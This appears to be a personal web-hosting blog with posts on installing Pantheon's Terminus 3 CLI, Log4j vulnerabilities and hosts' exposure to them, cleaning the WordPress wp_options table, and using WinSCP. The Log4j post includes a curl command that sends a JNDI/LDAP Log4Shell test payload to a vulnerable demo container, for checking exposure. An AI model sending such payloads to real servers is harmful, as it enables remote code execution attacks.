Carey

Terminus 3

What a great way to start a new year with releases, as this is the same for the company offering the best WebOps SAAS (Software as a Service) Platform which is Pantheon. During the last week of December, a new version tag of Terminus has been released, comes version 3.

What is Terminus?

The Terminus command-line interface provides advanced interaction with Pantheon. Terminus enables you to do almost everything in a terminal that you can do in the Pantheon Dashboard, and much more. In practice, some of the features missing on the Dashboard are included in Terminus. Developers can also include in development workflow or as part of a script for deployment using continuous integration.

Operating System Compatibility

As of this writing tested to work on the following platforms

MacOS
Windows 10 – WSL 2 Ubuntu 20.0
Ubuntu 20.0 – this would include Ubuntu under Docker or VirtualBox

Before getting frustrated, included also are the list of platforms that Terminus would not work:

Windows 10 – Command Line
Windows 10 – Git Bash (MingW)
Ubuntu 18.0 and later versions
Linux system with coreutils equal to or less than 8.28

Prerequisites Library

PHP 7.4 or above
PHP Extensions (mbstring, xml, curl, cli)
curl
git (if you need to include plugins)

Installation

As for the prior version of Terminus, it can be installed in many ways, the new version is limited to work only on the standalone PHAR package. Assuming all the requirements are met. Start the installation on the home folder

cd ~
mkdir ~/terminus && cd ~/terminus 
curl -L https://github.com/pantheon-systems/terminus/releases/download/`curl --silent "https://api.github.com/repos/pantheon-systems/terminus/releases/latest" | perl -nle'print $& while m#"tag_name": "\K[^"]*#g'`/terminus.phar --output terminus
chmod +x terminus
sudo ln -s ~/terminus/terminus /usr/local/bin/terminus

Plugins

The new version of Terminus comes with a plugin manager, installation now can be done using the terminus command

terminus self:plugin:install pantheon-systems/terminus-build-tools-plugin

That would work if the plugin is added to packagist, don’t worry you can add an old plugin by means of adding the path.

terminus self:plugin:install <plugin_name> <path>

To update the latest version of the plugin from packagist:

terminus self:plugin:update <plugin_name>

To remove the plugin:

terminus self:plugin:uninstall <plugin_name>

January 7, 2022 by Carey Pantheon 0

Log4j vulnerability new variants

The security team from Cloudflare did continue to investigate and found additional flaws in the 2.15.0 version of Apache Log4j, which allows adversaries to initiate denial-of-service (DoS) attacks (CVE-2021-45046). The issue has been addressed on the newly available version which is 2.16.0. All companies which include Log4j on their infrastructure stack are suggested to patch to the updated version.

Cloudflare is known for its DDOS protection and is used by more than seven million websites, they have advised their customers to modify the WAF configuration to mitigate the exploit.

Rule ID	Description	Default Action
`100514` (legacy WAF) `6b1cc72dff9746469d4695a474430f12` (new WAF)	Log4J Headers	`BLOCK`
`100515` (legacy WAF) `0c054d4e4dd5455c9ff8f01efe5abb10` (new WAF)	Log4J Body	`BLOCK`
`100516` (legacy WAF) `5f6744fa026a4638bda5b3d7d5e015dd` (new WAF)	Log4J URL	`BLOCK`

Source: https://blog.cloudflare.com/protection-against-cve-2021-45046-the-additional-log4j-rce-vulnerability/

The mitigation is divided into three rules that look at HTTP headers, body, and URL, in that order.

They have also introduced a fourth rule that will guard against a far broader variety of assaults at the cost of a greater false-positive rate. As a result, they have made it available, but it’s not set to BLOCK by default:

Rule ID	Description	Default Action
`100517` (legacy WAF) `2c5413e155db4365befe0df160ba67d7` (new WAF)	Log4J Advanced URI, Headers	`DISABLED`

Source: https://blog.cloudflare.com/protection-against-cve-2021-45046-the-additional-log4j-rce-vulnerability/

Cloudflare was the preferred choice of Kinsta, to make client websites faster and more secure. The reason they are not affected by log4j vulnerability. Kinsta is a managed WordPress hosting company that offers feature-rich, cost-effective services. They received the highest rating this year from the G2 review.

The Microsoft Threat Intelligence Center (MSTIC) which is behind the famous Windows Defender, is also acting proactively on new threats in relation to the Apache log4j vulnerability. They posted new updates regularly in regards to log4j, here in this URL https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/

The cyber security experts from Praetorian posted on their youtube channel showing the 2.15.0 version of log4j still allows fetching of sensitive data.

Website owners are also worried that the vulnerability might be affecting their business. As the holidays are coming near, hopefully, vacation plans for this year’s end would not be canceled.

December 17, 2021 by Carey Wordpress 0

Worrying about Apache Log4j vulnerability

Apache Log4j is a logging utility that is part of the Apache Logging Services. The nature of this logging service is that it accepts logged messages to contain format strings that can be referenced remotely thru Java Naming and Directory Interface (JNDI). Information can be obtained remotely via a variety of protocols, including the Lightweight Directory Access Protocol (LDAP), Remote Method Invocation (RMI), and Domain Name Service (DNS).

Does websites using cPanel are affected?

A basic cPanel service is not affected, some services have the Apache Solr on it since the Solr service cannot be accessed remotely. All big companies that utilize cPanel like GoDaddy, Bluehost, and Hostgator are not affected by this vulnerability.

Is Pantheon affected by log4j vulnerability?

No, Pantheon is not affected by the log4j vulnerability. Here’s the information from their status page:

Pantheon has verified that the platform is not vulnerable to the security issue related to the open-source Apache “Log4j2″ utility.

Log4j is a Java-based logging utility found in a large number of software products.

The CVE-2021-44228 [1] vulnerability (aka the “Log4Shell” vulnerability) was disclosed by the Apache Log4j project. If exploited, this vulnerability could potentially allow a remote attacker to execute code on the server.

Once this vulnerability was publicly disclosed on the 9th December 2021, Pantheon began an audit of our infrastructure, as well as engaging with our software vendors, to determine potential impact. While our exposure to the vulnerability has been minimal, we have directly remediated components and verified that existing defense in depth measures prevent exploitation as researchers have published.
https://status.pantheon.io/incidents/w2p9bgp05j0j

Is WPEngine affected by log4j vulnerability?

No, WPEngine does not utilize the log4j on their platform stack.

Is Platform.sh affected by log4j vulnerability?

No by default but if the site has custom Java code better contact the development team to review the code. Here’s their official statement:

A thorough investigation of our products and services has led us to believe our services are protected from the worst form of remote code execution. The threat of information disclosure is reduced because we aren’t sending application variables to these services. To further reduce that threat, these services are also receiving updates to disable the undesired behavior of Log4j. We’ve confirmed with our backend IaaS providers and with Fastly that they’ve either been unaffected or have mitigated any exposures.
If your project is running custom JAVA code in an app container, please immediately ask your developers to review your code for Lib4j2 usage and update it to the latest 2.15 branch.
https://status.platform.sh/incidents/k443m60v5txh

Other resources

Christophe Tafani-Dereeper demonstrates this vulnerability, on this GitHub repository https://github.com/christophetd/log4shell-vulnerable-app by means of a Docker container with the version of log4j that is vulnerable.

In a terminal run:

docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

Use this DNS logger tool dnslog.cn on your test payloads.

curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://xxx.dnslog.cn/a}'

You can also use the site(dnslog.cn) to identify if your server is vulnerable.

Here are some guides on how to mitigate the vulnerability.

December 13, 2021 by Carey Pantheon Wordpress 0

Optimize Database Performance – Cleaning WP Options Table

We all know WordPress is an application written in PHP and paired with MySQL or MariaDB database. The PHP language reads or writes to the database. This happens on every WordPress request, for example, like the home page that makes up links, content, theme, or plugin, there is always a call in the database.

One database table, in particular, that is overly used on this request is the WP Options table. The WP Options table stores the site data, when this table gets large this will contribute to sluggish response time. Cleaning the WP Options table can improve page generation speed.

Image from https://codex.wordpress.org/Database_Description

This is the only table on the database that is alone or without any table relationship, assuming it would add load if this is linked to another table, a flat table by design. Here is the table definition:

CREATE TABLE `wp_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `option_value` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `autoload` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`),
  KEY `autoload` (`autoload`)
) ENGINE=InnoDB;

Field	Type	Null	Key	Default	Extra
option_id	bigint(20) unsigned		Primary		auto_increment
option_name	varchar(191)		Unique
option_value	longtext
autoload	varchar(20)		Index	yes

By design, three out of one are indexed properly for an optimized SELECT query.

Removing Transients

Transients are temporary data of plugins and themes stored on the WP Options table. Usually, this has expiration dates but if the plugin has been deactivated or uninstalled the value on the table would remain in the database forever. Transients can be easily identified since a “transient” word can be found in the field option_name. To remove execute a DELETE SQL statement.

DELETE FROM wp_options WHERE option_name LIKE ('%\_transient\_%');

Removing Sessions

Sessions are temporary data that is generated from every user visit. This will be automatically be deleted after thirty minutes of user inactivity but that is not the case all the time. Manual removal is needed to clean up the session’s data.

DELETE FROM wp_options WHERE option_name like '_wp_session_%';

December 9, 2021 by Carey Wordpress 0

WinSCP on Pantheon

WinSCP is a popular free SFTP and FTP client for Windows, a powerful file manager that allows you to upload and download files on the Pantheon server. It provides a user-friendly interface for copying files between a local and remote computer using the FTP or SFTP protocol. This software is available only on Microsoft Windows.

Main Features

All common operations with files
Graphical Interface
Integrated text editor
Scripting and task automation
Translated into many languages

A complete WinSCP guide and an active user forum are freely accessible at the WinSCP site.

Download WinSCP

If you don’t already have WinSCP installed on your computer, download the most recent update and install it from their website.

Open WinSCP

Open WinSCP by accessing the application on the Windows Start menu. Make sure you have your site’s Pantheon SFTP connection information on hand. See the guidelines on how to find the SFTP credentials for your site if you need to get the connection details.

Enter the details from the Site Dashboard Connection Info from Pantheon. Use the password that is being used when logging into the Pantheon User Dashboard. Do check the protocol must be in SFTP and the port number is 2222.

Alternatively, you can also have passwordless access by using an SSH private key. Pantheon doesn’t offer SSH access to a shell environment but it allows it to be used on SFTP protocol.

You should add your public SSH key into your Pantheon account to get the most out of it. SSH keys are a better option for authentication than a basic password since they provide additional security protection. No matter how many sites you work on, you will only need to do this once. See Generate and Add SSH Keys for further information.

Click the Advanced select button, under SSH then click Authentication. Enter a private key in PPK format.

To get the site’s root simply navigate to the code folder and you will be able to download and upload files as normal.

December 7, 2021 by Carey Pantheon 0